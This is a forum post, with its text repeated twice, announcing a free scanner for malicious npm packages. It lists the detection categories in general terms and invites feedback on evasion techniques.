Hey guys,
With the recent wave of npm supply-chain attacks (typosquatting, maintainer takeovers, hidden execution in binding.gyp, etc.), I built a focused scanner: https://npmscan.com
What it catches:
- Heavy obfuscation / packer patterns
- Suspicious postinstall / preinstall hooks
- Drainers & credential exfil
- Known malicious indicators + heuristics (claims 99.8% on their dataset)
Scanned ~2.5M packages so far. Free to use, no login required for basic scans.
Example of recent catches: http://npmscan.com/latest-vulnerabilities/
Feedback welcome — especially from people who deal with malware dev / red teaming on JS side. What evasion techniques should I improve detection for?
GitHub / more details on the site.
With the recent wave of npm supply-chain attacks (typosquatting, maintainer takeovers, hidden execution in binding.gyp, etc.), I built a focused scanner: https://npmscan.com
What it catches:
- Heavy obfuscation / packer patterns
- Suspicious postinstall / preinstall hooks
- Drainers & credential exfil
- Known malicious indicators + heuristics (claims 99.8% on their dataset)
Scanned ~2.5M packages so far. Free to use, no login required for basic scans.
Example of recent catches: http://npmscan.com/latest-vulnerabilities/
Feedback welcome — especially from people who deal with malware dev / red teaming on JS side. What evasion techniques should I improve detection for?
GitHub / more details on the site.
